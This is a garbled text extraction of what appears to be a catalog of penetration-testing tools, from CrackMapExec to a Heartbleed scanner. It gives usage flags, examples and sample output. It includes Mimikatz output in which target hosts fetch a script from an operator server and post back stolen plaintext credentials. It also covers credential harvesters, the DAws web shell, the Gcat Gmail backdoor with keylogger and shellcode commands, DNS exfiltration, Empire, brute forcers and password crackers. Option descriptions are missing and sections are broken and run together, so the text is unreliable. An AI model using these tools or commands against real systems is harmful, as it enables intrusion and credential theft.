|_______|/__/ \__\ |
_______| \______|
Swiss army knife for pentesting Windows/
Active Directory environments | @byt3bl33d3r
Powered by Impacket https://
github.com/CoreSecurity/impacket (@agsolino)
Inspired by:
@ShawnDEvans's smbmap https://
github.com/ShawnDEvans/smbmap
@gojhonny's CredCrack https://
github.com/gojhonny/CredCrack
@pentestgeek's smbexec
https://github.com/pentestgeek/smbexec
positional arguments:
target
-t THREADS
to use
-u USERNAME
assumed
-p PASSWORD
Password
-H HASH
NTLM hash
-n NAMESPACE
cimv2)
-d DOMAIN
Domain name
-s SHARE
-P {139,445}
-v
Credential Gathering:
Options for gathering credentials
--sam
systems
--mimikatz
systems
--ntds {ninja,vss,drsuapi}
Dump the NTDS.dit from target DCs
using the specifed method
(drsuapi is the fastest)
Mapping/Enumeration:
Options for Mapping/Enumerating
--shares
List shares
--sessions
--users
Enumerate users
--lusers
--wmi QUERY
Account Bruteforcing:
found
Spidering:
Options for spidering shares
--spider FOLDER
1)
Command Execution:
Options for executing commands
--execm {atexec,wmi,smbexec}
Method to execute the command
(default: smbexec)
-x COMMAND
-X PS_COMMAND
command
Shellcode/EXE/DLL injection:
Options for injecting Shellcode/EXE/DLL's using
PowerShell
--inject {exe,shellcode,dll}
Inject Shellcode, EXE or a DLL
--path PATH
--download PATH
systems
--upload SRC DST
systems
--delete PATH
Examples
The most basic usage: scans the subnet using 100 concurrent
threads:
#~ python crackmapexec.py -t 100 172.16.206.0/24
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601
(name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600
(name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build
10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
Permissions
-----
-----------
ADMIN$
READ, WRITE
IPC$
NO ACCESS
C$
READ, WRITE
Permissions
-----
-----------
Users
READ, WRITE
ADMIN$
READ, WRITE
IPC$
NO ACCESS
C$
READ, WRITE
SHARE
Permissions
-----
-----------
Users
READ, WRITE
ADMIN$
READ, WRITE
IPC$
NO ACCESS
C$
READ, WRITE
Mimikatz.ps1 HTTP/1.1" 200 172.16.206.133 - - [19/Aug/2015 18:57:40] "GET /InvokeMimikatz.ps1 HTTP/1.1" 200 172.16.206.132 - - [19/Aug/2015 18:57:41] "GET /InvokeMimikatz.ps1 HTTP/1.1" 200 172.16.206.133 - - [19/Aug/2015 18:57:45] "POST / HTTP/
1.1" 200 [+] 172.16.206.133 Found plain text creds! Domain:
drugoutcove-pc Username: drugdealer Password: IloveMETH!@
$
[*] 172.16.206.133 Saved POST data to
Mimikatz-172.16.206.133-2015-08-19_18:57:45.log
172.16.206.130 - - [19/Aug/2015 18:57:47] "POST / HTTP/
1.1" 200 [*] 172.16.206.130 Saved POST data to
Mimikatz-172.16.206.130-2015-08-19_18:57:47.log
172.16.206.132 - - [19/Aug/2015 18:57:48] "POST / HTTP/
1.1" 200 [+] 172.16.206.132 Found plain text creds! Domain:
drugcompany-PC Username: drugcompany Password: IloveWEED!
@#
[+] 172.16.206.132 Found plain text creds! Domain:
DRUGCOMPANY-PC Username: drugdealer Password:
D0ntDoDrugsKIDS!@#
[*] 172.16.206.132 Saved POST data to
Mimikatz-172.16.206.132-2015-08-19_18:57:48.log
Lets Spider the C$ share starting from the Users folder for the
pattern password in all files and directories (concurrently):
#~ python crackmapexec.py -t 150 172.16.206.0/24 -u
username -p password --spider Users --depth 10 --pattern
password
Download CrackMapExec
CREDCRACK - FAST AND STEALTHY CREDENTIAL
HARVESTER
remote IP(s)
-l LHOST, --lhost LHOST
Local host IP to launch scans
from.
-t THREADS, --threads THREADS
Number of threads (default: 10)
Required:
-d DOMAIN, --domain DOMAIN
Domain or Workstation
-u USER, --user USER
Domain username
Examples:
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 t 20
Examples
----------------------------------------------------------------
\\192.168.1.102\ADMIN$
OPEN
\\192.168.1.102\C$
\\192.168.1.103\ADMIN$
OPEN
\\192.168.1.103\C$
CLOSED
\\192.168.1.103\F$
CLOSED
\\192.168.1.100\ADMIN$
CLOSED
\\192.168.1.100\C$
OPEN
\\192.168.1.100\NETLOGON
OPEN
\\192.168.1.100\SYSVOL
Harvesting credentials
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:
`. ())oo() .
|\(%()*^^()^\
%| |-%-------|
% \ | %
%
))
\|%________|
DownloadCredCrack
CREDMAP - THE CREDENTIAL MAPPER
-v/--verbose
-u/--username=USER..
-p/--password=PASS..
-e/--email=EMAIL
-l/--load=LOAD_FILE
format USER:PASSWORD
-x/--exclude=EXCLUDE
-o/--only=ONLY
-s/--safe-urls
-i/--ignore-proxy
--proxy=PROXY
"socks5://192.168.1.2:9050")
--list
EXAMPLES
./credmap.py --username janedoe --email janedoe@email.com
./credmap.py -u johndoe -e johndoe@email.com --exclude
"github.com, live.com"
./credmap.py -u johndoe -p abc123 -vvv --only
"linkedin.com, facebook.com"
PREREQUISITES
VIDEO
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Downloadcredmap
CROUTON - CHROMIUM OS UNIVERSAL CHROOT
ENVIRONMENT
add it. You can see the list of available targets by running sh
~/Downloads/crouton -t help.
Once you've set up your chroot, you can easily enter it using
the newly-installed enter-chroot command, or one of the
target-specific start* commands. Ta-da! That was easy.
Read more here.
DownloadCrouton
CROWBAR - BRUTE FORCING TOOL FOR PENTESTS
Installation
DownloadCrowbar
First, clone it :
$ git clone git@github.com:PaulSec/CSRFT.git
To make this project work, get the latest Node.js version here .
Go in the directory and install all the dependencies:
npm install
More information
The idea is to provide a 'basic' hierarchy (of the folders) for your
projects. I made the script quite modular so your configuration
files/malicious forms, etc. don't have to be in those folders
though. This is more like a good practice/advice for your future
projects.
However, here is a little summary of those folders :
conf folder : add your JSON configuration file with your
configuration.
your forms
attacks
lib : libs specific for my project (custom ones)
utils : folder containing utils such as : csrft_utils.py
which will launch CSRFT directly.
server.js file - the HTTP server
{
"audit": {
"name": "PoC done with Automatic Tool",
"scenario": [
{
"attack": [
{
"file": "./dicos/passwords.txt",
"method": "GET",
"type_attack": "dico",
"url": "http://www.vulnerable.com/
changePassword.php?newPassword=<%value%>"
}
]
}
]
}
}
]
}
]
}
}
}
}
You can now define some "steps", different attacks that will be
executed in a certain order.
Use cases
Download CSRFT
CUPP - COMMON USER PASSWORDS PROFILER
this menu
-i
profiling
-w
dictionary,
or WyD.pl output to make some pwnsauce :)
-l
-a
Configuration
DownloadCupp
CUSTOM-SSH-BACKDOOR - SSH BACKDOOR USING
PARAMIKO
DownloadCustom-SSH-Backdoor
DAMN VULNERABLE WEB APP - PHP/MYSQL TRAINING
There's multiple things that makes DAws better than every Web
Shell out there:
1. Bypasses Disablers; DAws isn't just about using a
particular function to get the job done, it uses up to 6
functions if needed, for example, if shell_exec was
disabled it would automatically use exec or passthru or
system or popen or proc_open instead, same for
2.
3.
4.
5.
6.
7.
Extra Info
Eval Form:
`include` is being used instead PHP `eval` to bypass
Protection Systems.
Download from Link - Methods:
PHP Curl
File_put_content
Zip - Methods:
Linux:
Zip
Windows:
Vbs Script
Shells and Tools:
Extra:
`nohup`, if installed, is automatically used for
background processing.
DownloadDAws
DHARMA - A GENERATION-BASED, CONTEXT-FREE
GRAMMAR FUZZER
None
Examples
Grammar Cheetsheet
Comment
%%% comment
Controls
%const% name := value
Sections
%section% := value
%section% := variable
%section% := variance
Extension methods
%range%(0-9)
%range%(0.0-9.0)
%range%(a-z)
%range%(!-~)
%range%(0x100-0x200)
%repeat%(+variable+)
%repeat%(+variable+, ", ")
%uri%(path)
%uri%(lookup_key)
%block%(path)
%choice%(foo, "bar", 1)
Assigning values
digit :=
%range%(0-9)
sign :=
+
value :=
+sign+%repeat%(+digit+)
Using values
+value+
Assigning variables
variable :=
@variable@ = new Foo();
Using variables
value :=
!variable!.bar();
DownloadDharma
DIRS3ARCH V0.3.0 - HTTP(S) DIRECTORY/FILE BRUTE
FORCER
Windows XP/7/8
GNU/Linux
MacOSX
Features
Multithreaded
Keep alive connections
Support for multiple extensions (-e|--extensions asp,php)
Reporting (plain text, JSON)
Detect not found web pages when 404 not found errors
are masked (.htaccess, web.config, etc).
Recursive brute forcing
HTTP(S) proxy support
Batch processing (-L)
Examples
Scan recursively:
python3 dirs3arch.py -u http://www.example.com/admin/
-e php -r
192.168.1.1
Batch processing:
python3 dirs3arch.py -L urllist.txt -e php
Thirdparty code
colorama
oset
urllib3
sqlmap
Changelog
DownloadDirs3arch
DISCOVER - CUSTOM BASH SCRIPTS USED TO
AUTOMATE VARIOUS PENTESTING TASKS
For use with Kali Linux. Custom bash scripts used to automate
various pentesting tasks.
Download, setup & usage
cd /opt/discover/
./setup.sh
./discover.sh
RECON
1.
Domain
2.
Person
3.
Parse salesforce
SCANNING
4.
5.
CIDR
6.
List
7.
IP or domain
WEB
8.
9.
Nikto
10. SSL
MISC
11. Crack WiFi
12. Parse XML
13. Start a Metasploit listener
14. Update
15. Exit
RECON
Domain
RECON
1.
Passive
2.
Active
3.
Previous menu
Person
RECON
First name:
Last name:
Parse salesforce
Create a free account at salesforce (https://
connect.data.com/login).
Perform a search on your target company > select the
company name > see all.
Copy the results into a new file.
Enter the location of your list:
SCANNING
2.
NetBIOS
3.
netdiscover
4.
Ping sweep
5.
Previous menu
External
2.
Internal
3.
Previous menu
External scan will set the nmap source port to 53 and the
max-rrt-timeout to 1500ms.
Internal scan will set the nmap source port to 88 and the
max-rrt-timeout to 500ms.
Nmap is used to perform host discovery, port scanning,
service enumeration and OS identification.
Matching nmap scripts are used for additional
enumeration.
Matching Metasploit auxiliary modules are also leveraged.
WEB
Open multiple tabs in Icewease
Open multiple tabs in Iceweasel with:
1.
List
2.
3.
Previous menu
Nikto
List of IPs.
2.
List of IP:port.
3.
Previous menu
SSL
Check for SSL certificate issues.
Enter the location of your list:
MISC
Crack WiFi
Crack wireless networks.
Parse XML
Parse XML to CSV.
1.
Burp (Base64)
2.
Nessus
3.
Nexpose
4.
Nmap
5.
Qualys
6.
Previous menu
Download Discover
DNSTEAL - DNS EXFILTRATION TOOL FOR STEALTHILY
SENDING FILES OVER DNS REQUESTS
This is a fake DNS server that allows you to stealthily extract
files from a victim machine through DNS requests.
Below is an image showing an example of how to use:
DownloadDNSteal
DOMI-OWNED - TOOL USED FOR COMPROMISING IBM/
LOTUS DOMINO SERVERS
USAGE
A valid username and password is not required unless
'names.nsf' and/or 'webadmin.nsf' requires authentication.
FINGERPRINTING
authentication.
If a username and password is given, Domi-Owned will check
to see if that account can access 'names.nsf' and
'webadmin.nsf' with those credentials.
REVERSE BRUTEFORCE
, a password with
-p
, and the
--bruteforce
flag. This prints the results to the screen and writes them to
separate out files depending on the hash type (Domino 5,
Domino 6, Domino 8).
QUICK CONSOLE
to quit the Quick Console interpreter, which will also delete the
'log.txt' output file.
EXAMPLES
FINGERPRINT DOMINO SERVER
DownloadDomi-Owned
DOUBLE THE BANG FOR YOUR BUCK WITH ACUNETIX
VULNERABILITY SCANNER
Joomla.
https://www.example.org/sites/all/modules/
pathauto/LICENSE.txt
https://www.example.org/sites/all/modules/
pathauto/API.txt
libraries https://www.example.org/sites/all/modules/
libraries/
https://www.example.org/sites/all/modules/
libraries/CHANGELOG.txt
https://www.example.org/sites/all/modules/
libraries/README.txt
https://www.example.org/sites/all/modules/
libraries/LICENSE.txt
entity https://www.example.org/sites/all/modules/
entity/
https://www.example.org/sites/all/modules/entity/
README.txt
https://www.example.org/sites/all/modules/entity/
LICENSE.txt
google_analytics https://www.example.org/sites/all/
modules/google_analytics/
https://www.example.org/sites/all/modules/
google_analytics/README.txt
https://www.example.org/sites/all/modules/
google_analytics/LICENSE.txt
ctools https://www.example.org/sites/all/modules/
ctools/
https://www.example.org/sites/all/modules/ctools/
CHANGELOG.txt
https://www.example.org/sites/all/modules/ctools/
LICENSE.txt
https://www.example.org/sites/all/modules/ctools/
API.txt
features https://www.example.org/sites/all/modules/
features/
https://www.example.org/sites/all/modules/
features/CHANGELOG.txt
https://www.example.org/sites/all/modules/
features/README.txt
https://www.example.org/sites/all/modules/
features/LICENSE.txt
https://www.example.org/sites/all/modules/
features/API.txt
[... snip for README ...]
[+] Scan finished (0:04:59.502427 elapsed)
Why not X?
Because droopescan:
is fast
is stable
is up to date
allows simultaneous scanning of multiple sites
is 100% python
Installation
Scan types.
Droopescan aims to be the most accurate by default, while not
overloading the target server due to excessive concurrent
requests. Due to this, by default, a large number of requests
will be made with four threads; change these settings by using
the --number and --threads arguments respectively.
This tool is able to perform four kinds of tests. By default all
tests are ran, but you can specify one of the following with the e or --enumerate flag:
p -- Plugin checks: Performs several thousand HTTP
requests and returns a listing of all plugins found to be
installed in the target host.
t -- Theme checks: As above, but for themes.
v -- Version checks: Downloads several files and, based
on the checksums of these files, returns a list of all
possible versions.
i -- Interesting url checks: Checks for interesting urls
(admin panels, readme files, etc.)
More notes regarding scanning can be found here.
Target specification
You can also omit the drupal argument. This will trigger CMS
identification, like so:
droopescan scan -u example.org
example.org
"is_empty": false,
"finds": [
{
"url": "https:\/\/www.drupal.org\/sites\/all\/
modules\/views\/",
"name": "views"
},
[...snip...]
]
}
}
Download Droopescan
DSHELL - NETWORK FORENSIC ANALYSIS FRAMEWORK
Prerequisites
Installation
python-
decode -h
decode -d <decoder>
Usage Examples
192.168.170.8:32795 ->
66-192-9-104.gen.twtelecom.net **
dns 2005-03-30 03:47:46
192.168.170.20:53
192.168.170.8:32795 ->
** 30144 A? www.netbsd.org / A:
192.168.170.8:32795 ->
192.168.170.8:32795 ->
192.168.170.8:32795 ->
CNAME: www.l.google.com **
dns 2005-03-30 03:47:46
192.168.170.20:53
192.168.170.8:32795 ->
NXDOMAIN **
dns 2005-03-30 03:52:17
192.168.170.20:53
192.168.170.8:32796 <-
localhost **
dns 2005-03-30 03:52:25
217.13.4.24:53
192.168.170.56:1711
<-
** 30307 A? GRIMM.utelsystems.local /
NXDOMAIN **
dns 2005-03-30 03:52:17
217.13.4.24:53
192.168.170.56:1710
<-
** 53344 A? GRIMM.utelsystems.local /
NXDOMAIN **
<title>Index of /</title>
</head>
<body>
<h1>Index of /</h1>
<pre><img src="/icons/blank.gif" alt="Icon "> <a href="?
C=N;O=D">Name</a>
<a href="?
C=M;O=A">Last modified</a>
a>
<a href="?C=S;O=A">Size</
06-Jul-2007
]"> <a
href="Efficient_Video_on_demand_over_Multicast.pdf">Effic
ient_Video_on_d..></a> 19-Dec-2006 03:17
<img src="/icons/unknown.gif" alt="[
291K
]"> <a
href="Welcome%20Stranger!!!">Welcome Stranger!!!</a>
28-Dec-2006 03:46
31-
44K
30-Dec-2006 08:59
28-Jun-2007 00:04
]"> <a
href="cisco_ccna_640-801_command_reference_guide.pdf">cis
co_ccna_640-801_c..></a> 28-Dec-2006 03:48
<img src="/icons/folder.gif" alt="[DIR]"> <a
236K
href="doc/">doc/</a>
19-Sep-2006 01:43
06-
03-Jul-2007
04-
31K
36K
]"> <a
href="pruef.pdf">pruef.pdf</a>
07:48
28-Dec-2006
88K
<hr></pre>
</body></html>
36
192.168.1.2 ->
UDP
60583
33436
0.0000s
2006-08-25 19:32:20.766761
192.168.1.2 ->
202.232.205.123
0
36
UDP
36
36
UDP
60583
33435
0.0000s
192.168.1.2 ->
2006-08-25 19:32:20.747503
202.232.205.123
33438
0.0000s
2006-08-25 19:32:20.634046
202.232.205.123
60583
192.168.1.2 ->
UDP
60583
33437
0.0000s
24
131.151.20.254 ->
UDP
201
24
24
150
24
138
138
131.151.1.254 ->
UDP
520
520
131.151.5.254 ->
UDP
520
520
131.151.104.96 ->
UDP
137
137
1.5020s
1999-11-05 18:20:43.087010
255.255.255.255
UDP
0.0000s
1999-11-05 18:20:41.521798
131.151.107.255
131.151.32.71 ->
0.0000s
1999-11-05 18:20:43.079765
255.255.255.255
0.0000s
1999-11-05 18:20:43.096540
255.255.255.255
520
0.0000s
1999-11-05 18:20:42.063074
131.151.32.255
520
131.151.6.254 ->
UDP
520
520
0.0000s
1999-11-05 18:20:43.368210
131.151.111.254 ->
255.255.255.255
0
24
UDP
24
UDP
24
520
UDP
520
520
131.151.115.254 ->
255.255.255.255
UDP
24
520
520
131.151.107.254 ->
255.255.255.255
UDP
24
201
201
UDP
138
138
0.0000s
520
131.151.5.55 ->
1999-11-05 18:20:43.183825
131.151.32.255
520
0.0000s
1999-11-05 18:20:40.112031
131.151.5.255
0.0000s
1999-11-05 18:20:43.363348
0
0.0000s
1999-11-05 18:20:43.375145
0
131.151.10.254 ->
520
0.0000s
1999-11-05 18:20:43.115330
255.255.255.255
131.151.32.254 ->
520
0.0000s
1999-11-05 18:20:43.250410
255.255.255.255
520
131.151.32.79 ->
UDP
138
138
0.0000s
Download Dshell
EGRESS-ASSESS - TOOL USED TO TEST EGRESS DATA
DETECTION CAPABILITIES
Usage
Now, to have the client connect and send data to the ftp server,
you could run...
./Egress-Assess.py --client ftp --username testuser -password pass123 --ip 192.168.63.149 --datatype ssn
DownloadEgress-Assess
EMPIRE - POWERSHELL POST-EXPLOITATION AGENT
Once you hit the main menu, youll see the number of active
agents, listeners, and loaded modules.
The help command should work for all menus, and almost
everything that can be tab-completable is (menu commands,
agent names, local file paths where relevant, etc.).
You can ctrl+C to rage quit at any point. Starting Empire back
up should preserve existing communicating agents, and any
existing listeners will be restarted (as their config is stored in
the sqlite backend database).
Listeners 101
can also use domain names here). The port will automatically
be pulled out, and the backend will detect if youre doing a
HTTP or HTTPS listener. For HTTPS listeners, you must first
set the CertPath to be a local .pem file. The provided ./data/
cert.sh script will generate a self-signed cert and place it in ./
data/empire.pem.
Set optional and WorkingHours, KillDate, DefaultDelay, and
DefaultJitter for the listener, as well as whatever name you
want it to be referred to as. You can then type execute to start
the listener. If the name is already taken, a nameX variant will
be used, and Empire will alert you if the port is already in use.
Stagers 101
DownloadEmpire
EVIL FOCA - MITM, DOS, DNS HIJACKING IN IPV4 AND
IPV6 PENETRATION TESTING TOOL
Windows XP or later.
.NET Framework 4 or later.
Winpcap library (http://www.winpcap.org)
DownloadEvil FOCA
EXPLOIT PACK - OPEN SOURCE SECURITY PROJECT
FOR PENETRATION TESTING AND EXPLOIT
DEVELOPMENT
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Database
* Added Pippingtom, SSHdefaultscan and pasteAnalyzer
plugins
Fixes:
* Debian install
* Saving objects without parent
* Visual fixes on Firefox
DownloadFaraday 1.0.15
FARADAY 1.0.16 - COLLABORATIVE PENETRATION TEST
AND VULNERABILITY MANAGEMENT PLATFORM
ever!
This release also features several new features developed
entirely by our community.
Changes:
/bin/getAllIpsNotServices.py
- get all IP addresses that have defined open port (/bin/
getAllbySrv.py) and get all IPs from targets without services (/
bin/delAllVulnsWith.py)
It's important to note that both these scripts hold a
variable that you can modify to alter its behaviour. /bin/
getAllbySrv.py has a port variable set to 8080 by default. /bin/
delAllVulnsWith.py does the same with a RegExp
* Added three Plugins:
- Immunity Canvas
Canvas configuration
- Dig
- Traceroute
* Refactor Plugin Base to update active WS name in var
* Refactor Plugins to use current WS in temp filename under
$HOME/.faraday/data. Affected Plugins:
- amap
- dnsmap
- nmap
- sslcheck
- wcscan
- webfuzzer
- nikto
Bug fixes:
* When the last workspace was null Faraday wouldn't start
* CSV export/import in QT
* Fixed bug that prevented the use of "reports" and "cwe"
strings in Workspace names
* Unicode support in Nexpose-full Plugin
* Fixed bug get_installed_distributions from handler exceptions
* Fixed bug in first run of Faraday with log path and API errors
DownloadFaraday1.0.16
FARADAY V1.0.7 - INTEGRATED PENETRATION-TEST
ENVIRONMENT A MULTIUSER PENETRATION TEST IDE
DownloadFaraday
FASTNETMON - VERY FAST DDOS ANALYZER WITH
SFLOW/NETFLOW/MIRROR SUPPORT
Supported platforms:
DownloadFastNetMon
FING - FIND OUT WHICH DEVICES ARE CONNECTED TO
YOUR WI-FI NETWORK
seconds.
Wake On LAN: Switch on your devices from your mobile
or tablet!
Ping and traceroute: Understand your network
performances.
Automatic DNS lookup and reverse lookup
Checks the availability of Internet connection
Works also with hosts outside your local network
Tracks when a device has gone online or offline
Launch Apps for specific ports, such as Browser, SSH,
FTP
Displays NetBIOS names and properties
Displays Bonjour info and properties
Supports identification by IP address for bridged networks
Sort by IP, MAC, Name, Vendor, State, Last Change.
Free of charge, no banner Ads
Available for iPhone, iPad and iPod Touch with retina and
standard displays.
Integrates with Fingbox to sync and backup your
customizations, merge networks with multiple access
points, monitor remote networks via Fingbox Sentinels,
get notifications of changes, and much more.
Fing is available on several other platforms, including
Windows, OS X and Linux. Check them out!
DownloadFing
FIREFOX AUTOCOMPLETE SPY - TOOL TO VIEW OR
DELETE AUTOFILL DATA FROM MOZILLA FIREFOX
Field Name
Value
Total Used Count
First Used Date
Last Used Date
How to Use
you to recover the master password and get back all the signon information.
Internals of FireMaster
[-d -f ]
[-h -f
-n
-g "charlist" [ -s | -p ] ]
[-b -m
-l
-c "charlist" -p "pattern" ]
-f
passwords.
Hybrid crack can find passwords like pass123, 123pass etc
-f
-g
strings
-n
word(pass123)
-p
word(123pass)
Brute Force Crack Options:
-b
-c
process
-m
-l
-p
Examples of FireMaster
// Dictionary Crack
FireMaster.exe -d -f c:\dictfile.txt auto
// Hybrid Crack
FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s
auto
// Brute-force Crack
FireMaster.exe -q -b -m 3 -l 10 -c "abcdetps123" "c:\my
test\firefox"
// Brute-force Crack with Pattern
FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??
123" auto
Download FireMaster
FIREMASTERCRACKER - FIREFOX MASTER PASSWORD
CRACKING SOFTWARE
DownloadFireMasterCracker
FIREPASSWORD - FIREFOX USERNAME & PASSWORD
RECOVERY TOOL
DownloadFirePassword
FLASHLIGHT - AUTOMATED INFORMATION GATHERING
TOOL FOR PENETRATION TESTERS
VIDEOS :
https://www.youtube.com/watch?
v=EUMKffaAxzs&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=4 https://www.youtube.com/watch?
v=qCgW-SfYl1c&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=5 https://www.youtube.com/watch?
v=98Soe01swR8&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=6 https://www.youtube.com/watch?
v=9wft9zuh1f0&list=PL1BVM6VWlmWZOv9Hv8TV2vkAlUmvA5g7&index=7
INSTALLATION
apt-get install nmap tshark tcpdump dsniff
1) PASSIVE SCAN
In passive scan, no packets are sent into wire. This type of
scan is used for listening network and analyzing packets.
To launch a passive scan by using Flashlight; a project name
should be specified like passive-pro-01. In the following
command, packets that are captured by eth0 are saved into /
root/Desktop/flashlight/output/passive-project-01/pcap"
directory, whereas, Pcap files and all logs are saved into "/root/
Desktop/log" directory.
./flashlight.py -s passive -p passive-pro-01 -i eth0 -o /
root/Desktop/flashlight_test -l /root/Desktop/log v
2) ACTIVE SCAN
During an active scan, NMAP scripts are used by reading the
configuration file. An example configuration file (flashlight.yaml)
is stored in config directory under the working directory.
tcp_ports:
- 21, 22, 23, 25, 80, 443, 445, 3128, 8080
udp_ports:
- 53, 161
scripts:
- http-enum
3) SCREEN SCAN
Screen Scan is used to get screenshots of web sites/
applications by using directives in config file (flashlight.yaml).
Directives in this file provide screen scan for four ports ("80,
443, 8080, 8443") screen_ports: - 80, 443, 8080, 8443 Sample
screen scan can be performed like this: ``` ./flashlight.py -p
project -s screen -d 192.168.74.0/24 -r /usr/local/rasterize.js -t
10 -v ```
4) FILTERING
Filtering option is used to analyse pcap files. An example for
this option is shown below: ``` ./flashlight.py -p filter-project -s
filter -f /root/Desktop/flashlight/output/passive-project-02/pcap/
20150815072543.pcap -v ``` By running this command some
files are created on filter sub-folder. This option analyzes
PCAP packets according to below properties:
Windows hosts
Top 10 DNS requests
...
DownloadFlashlight
FORPIX - SOFTWARE FOR DETECTING AFFINE IMAGE
FILES
Download Forpix
FRUITYWIFI V2.2 - WIRELESS NETWORK AUDITING TOOL
- Ethernet
Ethernet,
- Ethernet
3G/4G,
- Ethernet
Wifi,
- Wifi
Wifi,
- Wifi
3G/4G, etc.
Within the new options on the control panel we can change the
AP mode between Hostapd or Airmon-ng allowing to use more
chipsets like Realtek.
It is possible customize each one of the network interfaces
which allows the user to keep the current setup or change it
completely.
Changelog
v2.2
v2.1
DownloadFruityWifi
FTPMAP - FTP SCANNER IN C
COMPILATION
./configure
make
make install
Don't trust this. Script kiddies are just ignoring banners. If they
read that "XYZ FTP software has a vulnerability", they will try
the exploit on all FTP servers they will find, whatever software
they are running. The same thing goes for free and commercial
vulnerability scanners. They are probing exploits to find
potential holes, and they just discard banners and messages.
On the other hand, removing software name and version is
confusing for the system administrator, who has no way to
quickly check what's installed on his servers.
If you want to sleep quietly, the best thing to do is to keep your
systems up to date : subscribe to mailing lists and apply vendor
patches.
Downloading Ftpmap
git clone git://github.com/Hypsurus/ftpmap
DownloadFTPMap
GCAT - A STEALTHY BACKDOOR THAT USES GMAIL AS
A COMMAND AND CONTROL SERVER
Usage
Gcat
optional arguments:
-h, --help
-v, --version
exit
-id ID
Client to target
-jobid JOBID
Job id to retrieve
-list
-info
Commands:
Commands to execute on an implant
-cmd CMD
-download PATH
system
-exec-shellcode FILE
client
-screenshot
Take a screenshot
-lock-screen
-force-checkin
Force a check in
-start-keylogger
Start keylogger
-stop-keylogger
Stop keylogger
x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600SP3-x86
Windows IP Configuration
Host Name . . . . . . . . . . . . :
unknown-2d44b52
Primary Dns Suffix
. . . . . . . :
-- SNIP --
That's the gist of it! But you can do much more as you can
see from the usage of the script! ;)
Download Gcat
GEOTWEET - SOCIAL ENGINEERING TOOL FOR HUMAN
HACKING
Allows you to search on tags, world zones and user (info and
timeline).
Requirements
Python 2.7
PyQt4, tweepy, geopy, ca_certs_locater, pythoninstagram
Works on Linux, Windows, Mac OSX, BSD
Installation
git clone https://github.com/Pinperepette/
Geotweet_GUI.git
cd Geotweet_GUI
chmode +x Geotweet.py
sudo apt-get install python-pip
sudo pip install tweepy
sudo pip install geopy
sudo pip install ca_certs_locater
sudo pip install python-instagram
python ./Geotweet.py
Video
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Download Geotweet
GETHEAD - HTTP HEADER ANALYSIS VULNERABILITY
TOOL
Changelog
Features in Development
DownloadGetHead
GHIRO 0.2 - AUTOMATED DIGITAL IMAGE FORENSICS
TOOL
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
MAIN FEATURES
Metadata extraction
Metadata are divided in several categories depending on the
standard they come from. Image metadata are extracted and
categorized. For example: EXIF, IPTC, XMP.
GPS Localization
Embedded in the image metadata sometimes there is a geotag,
hash. You can provide a list of hashes and all images matching
are reported.
DownloadGhiro
GITROB - RECONNAISSANCE TOOL FOR GITHUB
ORGANIZATIONS
DownloadGitrob
GOACCESS - REAL-TIME WEB LOG ANALYZER AND
INTERACTIVE VIEWER
GoAccess parses the specified web log file and outputs the
data to the X terminal.
General statistics, bandwidth, etc.
Time taken to serve the request (useful to track pages that
are slowing down your site)
Top visitors
Requested files & static files
404 or Not Found
Download GoAccess
GPING - PING, BUT WITH A GRAPH
visualize the data. I still wanted to just use the command line
though, so I decided to try and write a cross platform one that I
could use. And here we are.
Code
For a quick hack the code started off really nice, but after I
decided pretty colors were a good addition it quickly got rather
complicated. Inside pinger.py is a function plot() , this uses a
canvas-like object to "draw" things like lines and boxes to the
screen. I found on Windows that changing the colors is slow
and caused the screen to flicker, so theres a big mess of a
function called process_colors to try and optimize that. Don't
ask.
Download Gping
GRAUDIT - FIND POTENTIAL SECURITY FLAWS IN
SOURCE CODE USING GREP
Perl
PHP
Python
Other (looks for suspicious comments, etc)
USAGE
DEPENDENCIES
-d
database to use
Download Graudit
GRINDER - SYSTEM TO AUTOMATE THE FUZZING OF
WEB BROWSERS
DownloadGrinder
GRYFFIN - LARGE SCALE WEB SECURITY SCANNING
PLATFORM
Coverage
Coverage has two dimensions - one during crawl and the other
during fuzzing. In crawl phase, coverage implies being able to
find as much of the application footprint. In scan phase, or while
fuzzing, it implies being able to test each part of the application
for an applied set of vulnerabilities in a deep.
Crawl Coverage
Today a large number of web applications are template-driven,
meaning the same code or path generates millions of URLs.
For a security scanner, it just needs one of the millions of URLs
generated by the same code or path. Gryffin's crawler does just
that.
Page Deduplication
At the heart of Gryffin is a deduplication engine that compares
a new page with already seen pages. If the HTML structure of
the new page is similar to those already seen, it is classified as
a duplicate and not crawled further.
Scale
While Gryffin is available as a standalone package, it's primarily
built for scale.
Gryffin is built on the publisher-subscriber model. Each
component is either a publisher, or a subscriber, or both. This
allows Gryffin to scale horizontally by simply adding more
subscriber or publisher nodes.
Operating Gryffin
Pre-requisites
1. Go
2. PhantomJS, v2
3. Sqlmap (for fuzzing SQLi)
Run
TODO
1.
2.
3.
4.
5.
6.
7.
DownloadGryffin
HEARTBLEED VULNERABILITY SCANNER - NETWORK
SCANNER FOR OPENSSL MEMORY LEAK
(CVE-2014-0160)
Sample usage
Dependencies
| |
(_)
| |
| |
| |
| |__
| '_ \| |/ _` |/ _` |/ _ \ '_ \
| | | | | (_| | (_| |
| |_ ___
| __/ _ \/ _` | '__|
__/ | | | | ||
__ _ _ __
__/ (_| | |
\__\___|\__,_|_|
Demonstration Video
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
